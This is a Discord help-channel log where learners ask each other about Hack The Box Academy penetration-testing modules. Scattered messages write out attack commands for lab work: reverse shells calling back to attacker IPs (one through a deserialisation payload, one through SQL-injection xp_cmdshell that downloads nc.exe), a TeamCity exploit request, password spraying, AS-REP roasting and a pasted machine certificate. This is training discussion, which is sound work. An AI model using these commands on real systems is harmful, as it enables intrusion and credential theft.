#modules

1 messages Β· Page 446 of 1

quiet trout
#

to get myself back to where i was.

fathom pendant
#

Just visit in browser

quiet trout
#

404

fathom pendant
#

Β―_(ツ)_/Β―

#

Are you on the right subdomain then?

quiet trout
#

oh i didnt realize that it was not on both. Ok thats a good sign. But the last two Qs talk about crawl the inlanefreight.htb domain.... do they mean

*.inlanefreight.htb
or
inlanefreight.htb/*

doesnt matter much but im not getting anything other than what i already have for both

#

maybe ferox buster is the move here

#

but i havent had any success with either uh ReconSpider, ffuf for content enum on either the sub or the domain so im not sure what another fuzz is gonna do

#

like nto even one result to let me know im on the right path

fathom pendant
#

And by dig deeper i mean: look for other subdomains

#

When you find a new subdomain, add it to the hosts file

quiet trout
#

Thank you for the advice. But ive used practically every subdomain list. I did find the one with admin, are you saying theres more than 1? Sorry if im asking to be spoonfed here.

fathom pendant
#

Rinse and repeat

quiet trout
#

oh snap

#

sub of sub. i did evertything but that

#

holy kiss my grits batman

fathom pendant
#

That won't have hidden admin

#

Btw

#

And a crawler won't find the hidden file, because robots says no

quiet trout
#

I see, thank you. I think I've "made the loop" but i dont have any content yet that i can tell certainly not anything with an email or additional api key

#

im gonna try reconspider again i guess

oak raptor
#

hello can someone help me on Documentation & Reporting - Skills Assessment
i have 3 hosts and got root on 2 of them but i can't even ping DC
nvm, reset the lab and dc ip pop-up

white crest
#

Hi everyone, could someone help me with understanding something? I'm on the Logrotate section of Linux Privilege Escalation and I'm a little confused. I get the concept of using Logrotten to run a payload when it rotates a log file, but I dont understand a couple things.

  1. how do we know that Logrotate manages the .log files wtihin the /backups folder
  2. how do we know what mode logrotate is using for those log files
  3. how do we know we need to enter text inside the log file to force it to rotate?
#

And also how do we know that the flag is located in /root/flag.txt when we cant look inside /root?

grim gust
#

Is there maintenance on the labs ?
The machine's disaperers and comes back ???

digital pendant
#

seeing same as you hklm, like RDP sessions refreshing every couple minutes

grim gust
#

Yup that is what I see πŸ™ was very stable the last 2 weeks πŸ™‚ πŸ™‚ πŸ™‚ but this evening πŸ™

103 packets transmitted, 43 received, 58.2524% packet loss, time 103499ms
torn kayak
#

could anyone point me in the right direction? I am trying to coerce from Target to my box, Target has webdav on, I got responder up on my box, but when I use Coercer with coerce it says [!] (NO_AUTH_RECEIVED) (it's from NTLM Relay Attacks)

cloud urchin
#

@hazy brook Please do not post content from modules above tier 0, especially skill assessments

hazy brook
#

🫀 I thought it was quite censored, sorry

#

I will never understand why if the purpose of the platform is to learn, doubts cannot be shared.

Anyway, that's fine too

fathom pendant
stray wadi
#

Can I possibly get some assistance for the Unit Active Directory Enumeration & Attacks? The Section is Internal Password Spraying - from Linux & the question is: Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer. So far I have made the username list via using kerbrute & when running this command (kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 found_usernames.txt Welcome1) I do not get any found usernames starting with 's'. I tried restarting the ip address via hackthebox and it also gave me the same issue as before.

gray yacht
stray wadi
stray wadi
brave field
#

DM me if still stuck

plain summit
#

Windows Privilege Escalation - Kernel Exploits CVE-2020-0668 Example

I was trying to get net start MozillaMaintenance to work in the RDP machine which resulted in The program or feature "\??\C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available.

barren apex
#

Module: Pivoting & Tunneling
Section: Meterpreter Tunneling & Port Forwarding
I'm working on the exercise of this section, and I'm doing everything according to the module
I'm trying to setup a socks proxy with metasploit, and I see the exact same output as shown in the module, yet when I perform the nmap scan with proxychains I get filtered instead of open for port 3389 on host 172.16.5.19 (obtained by the ping sweep).

Did anyone have the same issue?

#

I tried both SOCKS5 and SOCKS4 and the results are still the same

hollow kernel
#

Hi
In attacking common services easy lab
I got a reverse Shell with powershell base64 in my kali
But i cant execute any command

#

I dont know why, i know if You have a Linux You can get a interactive Shell
In Windows powershell can i do the same?

barren apex
#

your question doesn't really shows what kind of problem you're having

plain summit
analog carbon
#

Anyone doing the new module attacking AI application and systems yet

#

Need some help πŸ™‚

lunar torrent
#

Once you get cve-2019-10945 working it will show you the filename of the flag. Because this is in webroot you can just curl the vHost and the filename of the flag. The return is the contents of the flag.

soft moon
#

I broke things and still confused about how to get this deprecated cryptographic to work
thi is for https://academy.hackthebox.com/module/147/section/1335

tried these but nothing worked
https://github.com/ThePorgs/Exegol-images/issues/367
https://github.com/fortra/impacket/issues/1716
even booting up the HTB PWNBOX but that is more broken than my system

[*] GOT CERTIFICATE! ID 13
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in getattr
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

GitHub

Describe the bug There is an issue with the PyOpenSSL library used by Impacket. Indeed, we encounter the following error when trying, for example, to retrieve an ADCS certificate : AttributeError: ...

GitHub

Configuration impacket version: 0.11.0 Python version: 3.11.8 Target OS: Kali Linux Debug Output With Command String ntlmrelayx.py -t ldaps://domain.com --shadow-credentials -smb2support --no-dump ...

west arrow
#

Hello guys, how come when i am AS-REP Roast, when i get the hash with kerbrute i can't crack it, but when i get the hash with GetNPUsers.py I can crack it....

Doesn't make sense to me

#

Kerbrute command:
kerbrute userenum -d htb.local --dc 10.10.10.161 /tmp/forest/users.txt

GetNPUsers.py command:
for user in $(cat /tmp/forest/users.txt); do python3.11 GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

digital pendant
#

Anyone know if JuicyPotato is intentionally not meant to work on the target @ Windows Privilege Escalation Section: SeImpersonate and SeAssignPrimaryToken

#

I can't reveal much more than that without spoiling module content... so DM if you know πŸ™‚

west arrow
digital pendant
#

may I DM you to check my cmd please? edit: resolved, thank you Nathan

little terrace
#

why does going xxx.inlanefreight.local and IP on firefox bring me to different pages?
am i not essentially querying the same IP?

fathom pendant
brave field
brave field
west arrow
forest tendon
#

I just completed introduction to active directory along the guided labs, the labs were fun

#

Where should i go next from here?

dry falcon
#

its from which section ?

dry falcon
#

i doing Attacking the OS section , not reached there . pika

leaden lichen
#

Hi everyone

dry falcon
#

Attacking Common Applications - Skills Assessment III

what to do now ? idk reverse engineering much

soft moon
#

could someone please help me with this sections it been pure pain for the password attack module everything was fine until legit this section couldnt configure my kali so grabbed a VM of a older version of Kali and now have this as my "Base64 Certification of user DC01$:"
https://academy.hackthebox.com/module/147/section/1335
MIIRrQIBAzCCEWcGCSqGSIb3DQEHAaCCEVgEghFUMIIRUDCCB4cGCSqGSIb3DQEHBqCCB3gwggd0AgEAMIIHbQYJKoZIhvcNAQcBMBwGCiqGSIb3DQEMAQMwDgQIM1KQZyxrR4UCAggAgIIHQJtMltjXBgqx9qmKav8Lng1nnyhiMH9/968l8YT2Kuo+910b5UyKgXPcuoK8vp3ZpLImysz1KwpQIpN/ihKlBmudOuiPXuf3tI6zNMvbQMDXS/5EVNJJhyoxORJNzxpU/Fz60FEBDRtT4upIoAUoFms7OuwLym/L0aBV2l9qiNXvk0MdsDXibkNpWM7ky8KWv0TgEp8nNZnOPWNdT/te5IgCOZ73HWnB9Obbkc59YeFLIvzqZpVk8Q1GUlBptJebPy4fTfgjVQ1Xh82posbGzkyZLMmGQHbYhA9qHRLxSF5uUyS6RemUc/aeB9JC4hR/k7/oqNwpxjkPtj42bbLi/PGSC1T7cFDiZf98ZeM8YjXNqGI0HKBGUnCOjdsf6koBM3mCp3MxB8NcqKn0yfu0foTPJUCTvucK44Ml19seBJNyV5Cc0FpLkiK8I+9yg1lWlbQmS2PWdZV9A5DrMkzbT6W0QHJgOwl+OPvyimKHpxFKTwRScAnOlds44RmHZHp+gtSJERt+QTJVGX/Y7NrnbE8LDDZuEZLmuWYqiM+OCBRRRvmO6Xa0MWB1byd0qGkglQ4kQ2lAbi/ etc etc

gray yacht
soft moon
#

huh this wasnt on the material but if this work r1cky you have saved me legit been on this for a few weeks now...

#

of course this old kali doesnt have netexec hahahaha

gray yacht
soft moon
#

where did you find this info prior knowledge or just searching how to authenticate with pfxb64 files?

#

very curious how fast you came to hit me information hahahaha

gray yacht
soft moon
#

true perhaps I need to expand my knowledge more on your comment, I am curious although it tends to result in broken VMs hahahaha

gray yacht
soft moon
#

ive had bad experiences with snapshots hahaha

#

although could try again since its at my own home

empty egret
#

Hello

gray yacht
# soft moon although could try again since its at my own home

So yeah anyways, use the labs as an opportunity to explore tools and different ways to perform the same thing. The 2 is 1 and 1 is none mantra should always be used, otherwise that one tool you rely on becomes a single point of failure when it doesn't work.

soft moon
#

very true just like a failure domain with switches and routers xD
cheers r1cky might have to start looking at those retired lab boxes

torn kayak
#

is anyone having issues with the NTLM Relay Attacks module too? I literally respawn the lab non stop and .60 will not turn on...

mellow light
#

And why I got 2 ips in the task where I shoul put them

cinder lion
#

I am still stuck. Appreciate any hints or pointers. Thank you.

onyx stag
#

Hi guys, I'm in this /module/69/section/2083 few days ago, someone can help me with this question - Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

mellow light
gray yacht
gray yacht
gray yacht
torn kayak
#

NTLM Relay Attacks targeting kerberos, after 3 or 4 restarts .60 finally booted

#

I opened a ticket anyway (got a little frustrated because I am time-constrained and waiting 3-5 minutes for each restart makes it tough)

gray yacht
onyx stag
gray yacht
onyx stag
# gray yacht Are you still stuck?

YES it's the last question for finish this module and i found 13 users 3 have quick acces for admin for me it's 23.08% but i did something wrong the answers it's not accepted

dull solar
#

Module: Linux Fundamentals
Section: File System Management
If you have to kill open files before unplugging a storage device in this case a USB drive, to prevent corruption or wtv.
Why does he use 'lsof ~ grep cry0l1t3', wouldn't you use something that targets the USB instead? Sorry if my question comes across as naive.

gray yacht
mellow light
#
10.129.142.56 DC01.INLANEFREIGHT.LOCAL DC01
``` here my /etc/hosts
gray yacht
mellow light
dull solar
#

Just use ip a | grep "1500"

#

Or just use ip a and look for a 1500.

mellow light
dull solar
#

|

cinder lion
gray yacht
dull solar
#

Lmk if it worked?

old plaza
#

Did anyone complete the esc11 lab in Adcs attacks module? facing some issues

#

tried ways to dump local administrator ntlm hash on ws01 but no luck till now

torn fiber
#

i am going through a problem in module password attack sub module pass the certificate a certificate was issued for DC01$ it is not issueing the certificate i have tried the given command for my PTCDC01 and PTCCA01 for printerbug.py and viseversa i know what to do but it is not working for me please guide me someone

torn fiber
soft moon
#

Im as lost as you are sadly

#

taking a break and doing some retired boxes tomorrow just overworked myself today

quiet trout
torn fiber
#

i guess me too rest here since i cannot gain a TGT as DC01$ initail part for PTC

gray yacht
gray yacht
torn fiber
teal arrow
#

Module: Attacking Common Applications
Lesson: Attacking Thick Client Applications

After I disable the permissions on the users, and run ./restart-oracleservice.exe the files aren't created. Can I get a nudge, I'm very lost lol

quiet trout
#

maybe i need to enable then start?

gray yacht
quiet trout
#

yes

#

Do i need to run it from inside the 10.x.x.x box?

#

run it when ssh'd in to 10.x.x.x*

gray yacht
fathom pendant
quiet trout
#

thanks that wasnt apparent. i saw the reminder but it only mentioned how to access not that it was already running

quiet trout
#

Chats a lull, @fathom pendant unrelated to the module, do you find the nessus html (or other) report output to be less than useful for our purposes? I can see this being helpful for at a glance stuff for like non-technical reviewers or something but the fact it will output an html doc that doesnt have the stuff the full report in the service has... seems less than helpful. Is that what the nessus db export thing is for?

fathom pendant
#

I find it in the same vein as winpeas or linpeas or any of those tools

quiet trout
quiet trout
worldly valve
#

Sorry everyone, does anyone know why the windows rdp keeps disconnecting even when I connect via pawn machine

quiet trout
#

thats sorta "normal" in my experience.

#

i think some people say to connect with udp or something? i dunno i just struggle thru it and get it over with

rugged swan
#

Password attacks --> Credential Hunting in Network Shares. I'm stuck at this question: One of the shares mendres has access to contains valid credentials of another domain user. What is their password?

I tried to search for the following keywords "pass", "INLANEFREIGHT\" via man spider but none of the discovered passwords is the answer. Any idea on where I'm going wrong? Thanks

opal shuttle
#

you have to manually try that...manually hunt for that file

#

netexec will throw you an error

rugged swan
opal shuttle
torn fiber
rugged swan
opal shuttle
opal shuttle
#

try again

rugged swan
grim gust
#

Is there some kind of maintenance on the labs because I am loosing my RDP connection every minute or so πŸ™

#

Or is there something I can do ?

cloud urchin
#

Are you using the VPN at the same time as the pwnbox?

grim gust
#

No I only use the vpn.

cloud urchin
#

try servers or regions

grim gust
#

I will
Is UDP or TCP more stable ?

cloud urchin
#

TCP

quiet trout
#

https://academy.hackthebox.com/module/24/section/514

Question about whats being asked in the question #1

`Download the file flag.txt from the web root using python FROM the pwnbox. submit contents'

Does it want me to setup a python http.server (or similar) on pwnbox then upload it from the target?

#

or Download the file from the target where a python server is setup?

#

or use python to issue a get request? this is a strange way to word the question

#

(i understand the module, im just trying to stay as close to the "rules" as possible here)

#

I dont believe a "download with python" was mentioned in the sections. theres an "upload a file with python"

#

Im not gonna get too hung up on how, i've done it both ways by following the modules its just an odd wording. Thank you

rose stratus
#

i'm Windows Privilege Escalation > Citrix Breakout . The citrix environment is so slow. I tried a different vpn but same experience, Is this normal?

torn kayak
#

Some environments are slow, super slow

cloud urchin
hollow copper
#

Hello everybody I can't wait HOLMES competition

spare bridge
#

Hello guys, i cant really seem to able to type in any other channels, I am new to this channel but not new to cybersecurity, i know some concepts but they are very shallow and basic. I have been trying to figure it all out but it is very messy and i dont have a clear path. Is there anyone who can be my mentor please.

viral cobalt
#

Anyone around for the Pivot Tunneling and Port forwarding module? I'm stuck on the last 2 questions on the skill assessment I have the user but no creds

rugged star
#

Getting Started Module: I've had this issue for Nibbles and also the Knowledge Check after Nibbles: Essentially I get to the point where I'm trying to pop a shell and I can get it to do php commands such as whoami but no matter what reverse shell I try, I can't pick up packets. I'm routing it to the tun0 from the vpn but still

fathom pendant
#

replace the example command where it uses /dev/tcp/ip/port with your ip/port that you're using

#

i.e. /dev/tcp/10.10.14.1/7777

rugged star
#

i found i could ||edit the theme file||

#

so figured that was an option in

#

you can see the www-data from the whoami but my "nc -lvnp 4444" isnt picking anything up

fathom pendant
#

@rugged star try not to spoil skill assessments (knowledge checks)

rugged star
#

o my b

fathom pendant
#

also your revshell is missing a whole bunch of stuff

#

review the "nibbles - Initial foothold" section again

#

also you may want to incorporate using the "/bin/bash -c 'the other command here'" to ensure that you're running it all in bash

#

also make sure you're running your listener before you call the webpage to have it call back to you

rugged star
#

still dont see anything in my shell after it says "listening on 4444"

fathom pendant
#

You mixed your quotes

#

"/bin/bash -c" [some middle bit]""

#

Use single quotes to wrap the secondary command

gray yacht
rugged star
foggy monolith
rugged star
#

didnt get anything..

#

if it helps im not on the parrot vm im on arch im new to this universe so not sure what could affect what. I'm also using a different local shell called fish but dont think that matters

potent sandal
#

hello everbody i have a problem with exploiting the log4 vulnerability i create the pay load

  • java -jar ~/Apps/ysoserial-modified/target/ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.16.24/9001 0>&1' > cc5.ser
  • then run the java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L 10.10.16.24:1389 -P cc5.ser
  • have the nc -nvlp 9001 running and insert in tomcat but he give me always this ERROR BACK and i tried everypayload from JNDI EXPLOIT KIT
  • 2025-08-20 23:49:48 [LDAPSERVER] >> Send LDAP reference result for jkgzsw redirecting to http://10.10.16.24:8180/ExecTemplateJDK6.class
    2025-08-20 23:54:12 [LDAPSERVER] >> Send LDAP reference result for 9qlr0e redirecting to http://10.10.16.24:8180/ExecTemplateJDK8.class
rugged star
#

pretty sure i also confirmed that i can receive packets from it, cant remember how i did that but specifically reverse shell isnt working

gray yacht
#

Not sure if they are on pwnbox. I used my VM and brought them over.

rose stratus
#

how did you compile the pwn.c

fathom pendant
#

no, they aren't on the pwnbox. Generally speaking, I just pillaged all the stuff from the relevant C:/Tools/ files on the AD enum module and win priv sections

potent sandal
#

i would appreciate a little help kekhands

cloud urchin
#

@cedar mural Please don't reveal content from modules above tier 0

cedar mural
#

My bad, didn't realize I was revealing much

potent sandal
#

is from a box logforge

#

i think i am the wrong chat

rugged star
#

omg i did it i found a firewall on my machine lets go finally

acoustic owl
slate palm
#

Hey everyone, I'm stuck on a Blind SQLi to RCE problem and would appreciate a nudge in the right direction.

I'm using xp_cmdshell to get remote code execution. My PowerShell payload successfully downloads nc.exe from my machine to the target's c:\windows\tasks\ directoryβ€”I can see the GET request on my local web server.

However, the second part of the command, which should execute nc.exe to start a reverse shell, doesn't seem to work. I'm not getting a connection back on my netcat listener.

Here is the decoded PowerShell command I'm trying to execute:

(new-object net.webclient).downloadfile("http://10.10.16.4:8000/nc.exe", "c:\windows\tasks\nc.exe"); c:\windows\tasks\nc.exe -nv 10.10.16.4 1337 -e c:\windows\system32\cmd.exe;

And here's the full SQL injection payload I'm using (URL decoded for clarity):

'; exec xp_cmdshell 'powershell -exec bypass -enc <BASE64_PAYLOAD>'-- -

I've confirmed my listener is up on port 1337. Any ideas why the nc.exe execution might be failing? Perhaps an issue with permissions, antivirus, or firewall rules? Any tips for debugging this would be a huge help! Thanks.

lucid light
#

i think this question might have to be uppdated

#

The answer i get when i get the banner in the box is ******_9.2p1 ******* but the correct answer is ********_8.2p1 ****** when i reveal the answer.

fathom pendant
lucid light
#

tnx did not know

fathom pendant
#

it also helps to provide the module and section name so others can sanity check you

lucid light
#

was just going to do that

lucid light
fathom pendant
lucid light
fathom pendant
#

it's ok. discord doesn't make things intuitive sometimes

rose stratus
#

can anyone help? in question Submit the Administrator's flag from C:\Users\Administrator\Desktop from Windows Privilege Escalation > Citrix Breakout, i start the smbserver but when i go to paint within the citrix environment and put in the UNC \kali_ip\share, it doesn't connect

gusty wraith
#

Have you received an answer to this? I have the same issue.

#

Have you received an answer to this? I have the same issue

#

I have the same issue πŸ™„

fathom pendant
shut wraith
#

Can anyone please help to get ligolo client working on a windows target ?

#

For context -- chisel did not work on this target either

#

Is that a firewall problem

cloud urchin
#

which module section and question is this about

#

your error says the machine is actively refusing connections on that port, so some kind of network issue/not running the right syntax/wrong port/not privileged since it's port 443 etc

hollow kernel
#

Check*

torn fiber
#

@eternal crystal may i ask for your guidance since i am in the same module?

tired olive
#

i was working on the info sec foundations pathway a few months ago and stopped cause of school and work -- since then i have used the material roughly enough to be able to glance over my notes and understand what was happening quickly. im getting back into it with the summer ending and am wondering if its worth reviewing all my notes from this pathway or just finishing it off and building off what i currently have while pursuing pentest path

#

i feel like if i have any questions or info gaps i can just fill in or google whats necessary rather than spending all that time redoing modules

royal mulch
#

My monitor just broke guess no more coding for me for a while ❌️πŸ₯²

storm elk
#

Please keep the spoilers to a minimum @eternal crystal - take it to dm with them as this is not a tier 0 module πŸ™‚

#

Also removed your question as you were showing partial solutions πŸ˜‰

eternal crystal
eternal crystal
storm elk
#

Marking something as a spoiler isn't enough πŸ™‚ You could say "I am stuck on module X section Y, can someone help?"

#

no problem πŸ˜‰

eternal crystal
#

i am stuck on the skill assessment of password attacks module after the initial foothold. can somebody who has done the updated module help me over the DMs? ty

storm elk
#

you can dm me if you want @eternal crystal πŸ™‚ tell me what you've got and I'll try to help

wooden pier
#

Hello everyone. I'm currently doing the cjca path . I'm stuck in introduction to bash scripting module. In the flow control loops section. Can someone help plz

eager spindle
#

Hello, everyone. I’m working on the module Attacking Common Services - Easy. I found a user via ||smtp-user-enum|| and attempted password spraying on FTP, but it didn’t work. Any advice would be appreciated.

#

I also ran ||Gobusterto brute-force subdomains||. When I checked http://<ip>, I only saw a message saying ||'allow file upload'||, but I can’t figure out where the upload point actually is.

#

I attempted hydra mysql,but still failed

weak vapor
#

on the Filtering contents lesson, the final question is to find the number of sub-directories of the url https://www.inlanefreight[.]com using cURL. how does one solve that?

gusty wraith
tawdry meteor
#

Hi, is there a way to reset an academy module, at least the answers I have provided?

opal shuttle
tawdry meteor
#

I tried that, It just brings you to the beginning of the module

#

Doesn't reset the progress

#

Thanks anyways though

opal shuttle
#

@eternal crystal for that i reccomend everyone to compelte pivoting modle first..it clarifies most of the quesitons and problem one should face...becauuse socks proxy dual pivot all that stuuff

opal shuttle
#

that's what you can do

tawdry meteor
#

Yep I will do that

#

I just didn't want to give myself hints

opal shuttle
#

hahaha

opal shuttle
tawdry meteor
#

Almost the entirety of the defensive modules I unlocked xd

opal shuttle
#

ohh ohkk

hollow kernel
reef axle
#

Hello all, I'm stuck at API attacks BOLA section, if tried using the for loop and manually but i get 404 not found.

In the path /api/v1/supplier/quarterly-reports/[id]

brave scroll
#

Wordpress - Skills Assessment

I'm stuck on this question for a while.. i think i am not getting the question in real sense.
Can anyone have hint about this?

magic timber
#

Hello, im stuck on the Wi-Fi Penetration Testing Basics in the aigraph-ng part, i created a png graph, but i definitely not know how to show the graph/open the image,

fiery berry
gray yacht
reef axle
#

Yes i logged in using the supplied credentials then copied the jwt

#

Then used the given script changed the IP,port and path still no response

#

Used my token too

gray yacht
reef axle
gray yacht
brave scroll
terse bloom
#

Hello, does anyone know how to use responder over ligolo pivot tunnel?

brave scroll
#

@gray yacht can you guide where i am making mistake?

fiery berry
# brave scroll what do u mean?

the question is telling you to find a vulnerable plugin, after that read what the vulnerability does and how you can use it to answer your question.

gray yacht
brave scroll
austere hound
#

Hi all, i have a question. I m currently doing the "PRTG Network Monitor" module, but i can not obtain the reverse shell through the param execution via web GUI. I have used all the powershell reverse shells like for e.g. 'Power Shell #2' of 'https://www.revshells.com/' , but nothing works. I tried also the IEX technique, using a python server on my kali, i received the GET request from the target OS, but nothing on the nc listener. Can someone help me figure it out?

fiery berry
brave scroll
#

damn i got that man, thanks

#

i learn i have not to rely on output, must have to enumerate further manually

cedar mural
#

Would anyone be willing to help me with Burpsuite/Zaproxy? I am trying to bypass whitelist filter and I can't seem to do it.

silk lagoon
#

What’s the issue

cedar mural
#

On Zap I always get file successfully uploaded. On Burp I always receive Only images are allowed.

#

In the response

magic timber
#

Hey, im stuck on the Airdecap part in the wifi penetration basics module, i have a pcap file, but how can i read it? im in cli so wireshark cannot open it ?

vivid wagon
#

morning! i am only on the setup module or stage on HTB, experimenting with Wave, how do i create a bashrc file as i do not have one and am stuck on this

gray yacht
magic timber
#

ssh from the pwnbox

gray yacht
magic timber
#

yes but for rdp i do something like ssh wifi@ip

#

its not the good way?

gray yacht
magic timber
#

and how do i rdp from the pwnbox please?

gray yacht
cedar mural
# silk lagoon What’s the question

Burp/Zap don't show me when files actually bypass or maybe I am misunderstanding. I am able to upload the file but when I access it I get a 404 or that the file has errors.

fiery berry
cedar mural
dry falcon
cedar mural
dry falcon
dry falcon
#

fingerguns done

reef axle
#

guys, I'm having a problem with API Attacks -> broken authentication, I'm resetting the otp from email-otp end point of main MasonJenkins@ymail.com after resetting going to reset end point and capturing the request in burp, using intruder im fuzzing from 0000-9999 but all i receive is SuccessStatus:FALSE

#

what am i doing wrong

#

on all respones successstatus is false

#

now what should i do

gray yacht
zenith canopy
#

oh im sorry, didnt know that, could you explain what i might be missing?

quiet trout
#

https://academy.hackthebox.com/module/115/section/1205

i'm trying to do the msfvenom payload creation on a windows machine because it was the box used in the last section and this section only covers linux.

once i have the exe output, can i ... its a binary... i cant just cat its base64 encoding and copy paste right? these scenarios assume we have a way to deliver the exploti t to the target machine?

#

nvm this is mentioned in the section, you DO need a way t odeliver it

zenith canopy
gray yacht
opal cape
#

hey so im run this to confirm a password change: proxychains crackmapexec smb 172.16.8.3 -u xxxxx -p xxxx

#

but im only getting: [proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

#

my proxychains.conf is as follows. Why am i not getting a confirmation?

autumn pilot
#

Try to run the command with sudo

opal cape
#

ok with sudo now im getting this

little trench
#

hello everyone i am trying the Intro to Academy's Purple Module Page 6Usage Example: JetBrains TeamCity CVE-2023-42793 the Enabling Debug Mode for RCE and when i use it it shows this curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4" -X POST "http://10.129.76.28/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true"
Could not authenticate with provided token
To login manually go to "/login.html" page am i doing something wrong

lethal gyro
#

Hi to everyone, I have a problem to find the proper wordlist for this question:

What is the API key in the hidden admin directory that you have discovered on the target system?

I have already used "subdomains-top1million-110000.txt"

Module: Information Gathering - Web Edition
Content: Skills Assessment

opal cape
cedar blaze
#

aye greetings yall, I'm having trouble with the file uploading module, type filters https://academy.hackthebox.com/module/136/section/1290; I found what extensions are allowed and the content types, but I can't seem to be able to upload anything, I always get only images are allowed. the wordlist I use is generated with

#!/bin/bash

for char in '' "%20" "%0a" "%00" "%0d0a" "/" '.' "." "…" ":"; do
for ext in $(cat allowed_ext); do
echo shell$char$ext.jpg >> wordlist.txt
echo shell$ext$char.jpg >> wordlist.txt
echo shell.jpg$char$ext >> wordlist.txt
echo shell.jpg$ext$char >> wordlist.txt
done
done
cloud urchin
#

@little belfry This isn't the channel or server for something like that.

cedar blaze
cloud urchin
cedar blaze
#

yes, I've tried pretty much everything for the last couple hours πŸ™

cloud urchin
#

Something that helped me was getting an actual image file (jpg, gif, whatever), uploading that through a web proxy, and modifying the request by deleting the data (sans the file signature) and inserting the web shell payload.

cedar blaze
#

hmm, just how much of the magic should I leave there? I've tried with the following magics

GIF8
GIF87a
GIF89a
PNG
οΏ½οΏ½οΏ½οΏ½JFIFοΏ½οΏ½C

and with the following content-types

image/png
image/gif
image/jpeg
cloud urchin
#

A file signature is data used to identify or verify the content of a file. Such signatures are also known as magic numbers or magic bytes and are usually inserted at the beginning of the file.
Many file formats are not intended to be read as text. If such a file is accidentally viewed as a text file, its contents will be unintelligible. However,...

#

Get a real picture to upload and work your way forward from there, replace and test one thing at a time to see what exactly is blocking it

cedar blaze
#

from the looks of it it just gets blocked because of the content of the 'picture'. I have the same image uploaded with multiple content types / magics, but when I try to put the shell in there i get the error of "only images are allowed"

#

well it might just have been me deleting the ending of the packet with zap (at the end there is a large number that was getting deleted along with the content of the photo ... took bout 4/5 hours to realize that πŸ’€ )

#

god damnit man, it really was the random way zap ends packets πŸ’€

plain summit
#

Windows Privilege Escalation Further Credential Theft

I am not able to run the xfreerdp /v:targetIP /u:jordan /p:HTB_@academy_j0rdan! command for the first question

[15:08:43:635] [6187:6188] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:08:43:635] [6187:6188] [WARN][com.freerdp.crypto] - CN = WINLPE-SRV01
[15:08:43:836] [6187:6188] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
cloud urchin
#

try wrapping the password in quotes

drifting dirge
#

https://academy.hackthebox.com/module/315/section/3771 (Attacking AI - Application and System, Model Deployment Tampering)

I'm having some trouble with last step. For some reason I'm getting a YAML parsing error in JSON response.

{
  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}

Also, I don't see last RCE request. It seems like MyScriptEngineFactory.class is actually getting downloaded properly (200 code), but never executed. I'm not totally sure that provided YAML is enough to succesfully exploit the service. Maybe someone had the same issue?

plain summit
cloud urchin
plain summit
#

When I rebooted the box/target no but I let it run for an hour prior to reboot.

cloud urchin
#

idk should be working maybe try remmina or something else to see. double check network connections etc

rose stratus
quaint thunder
#

Hello

quiet trout
#

im in the middle of https://academy.hackthebox.com/module/115/section/1139 and im wondering if someone knows of another vnc tool than xfreerdp that will work for a "dynamic-resolution" this one doesnt work for the foothold box (maybbe cuz its linux?) my screen is too small ijust minmimized the terminal and i cant "get" it.

#

nvm remmina got me sorted

plain summit
#

Windows Privilege Escalation Citrix Breakout: Submit the Administrator's flag from C:\Users\Administrator\Desktop

How do I get out of the windows iso to do what I need to do in the ubuntu terminal?

gray yacht
onyx scroll
#

yo

#

may i ask for some help

#

regarding this module

gray yacht
# onyx scroll may i ask for some help

So you are provided a foothold correct? So take a small bit of time to enumerate that foothold a little as some things are in plain sight. I am also going to delete these screenshots as that module is above Tier 0. Regardless that should hopefully help you get started. Sorry I forgot what channel I was in when I posted this response.

rose stratus
#

@gray yacht thank you will do when I have time to tackle this question again

quiet trout
#

let me know if you want to soundboard ill be on for another hour or so

#

fuckin thing is CREEPIN

quiet trout
#

my nmaps were hanging

onyx scroll
#

but ty

quiet trout
#

not sure i follow you

#

thats not how i solved it but glad you got it

quiet trout
onyx scroll
#

well

#

managed to infiltrate

brave field
scarlet mountain
#

Use wordlist-mode with rockyou.txt to crack the RIPEMD-128 password. can anyone help me as i am stuck over here how to do it where to find the hash password attack module

rotund sequoia
#

